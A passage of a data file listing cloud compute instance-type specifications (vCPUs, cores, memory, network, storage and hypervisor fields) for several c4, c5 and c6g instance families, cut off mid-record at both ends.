'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '50 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '50 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1], 'SizeInMiB': 98304, 'TotalSizeInGB': 2850, 'Disks': [{'SizeInGB': 1425, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 2850, 'Disks': [{'SizeInGB': 1425, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 2400, 'Disks': [{'SizeInGB': 1200, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 2400, 'Disks': [{'SizeInGB': 1200, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1], 'SizeInMiB': 131072, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 